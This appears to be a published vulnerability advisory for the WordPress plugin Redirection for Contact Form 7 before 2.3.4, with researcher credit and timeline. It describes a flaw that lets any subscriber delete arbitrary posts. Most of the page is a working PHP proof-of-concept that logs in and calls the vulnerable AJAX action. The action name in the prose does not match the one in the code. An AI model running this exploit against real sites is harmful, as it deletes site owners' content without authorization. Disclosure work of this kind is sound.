WordPress Plugin Vulnerabilities
Redirection for Contact Form 7 < 2.3.4 - Authenticated Arbitrary Post Deletion
Description
In the plugin, any authenticated user, such as a subscriber, could use the delete_action_post AJAX action to delete any post on a target site.
Proof of Concept
<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'log' => $wp_user,
'pwd' => $wp_pass,
'rememberme' => 'forever',
'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);
// Set redirect url
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'action' => 'wpcf7r_delete_action',
'data[0][post_id]' => '1'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
Affects Plugins
Fixed in version 2.3.4
References
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-04-20 (about 1 years ago)
Added
2021-04-20 (about 1 years ago)
Last Updated
2021-04-21 (about 1 years ago)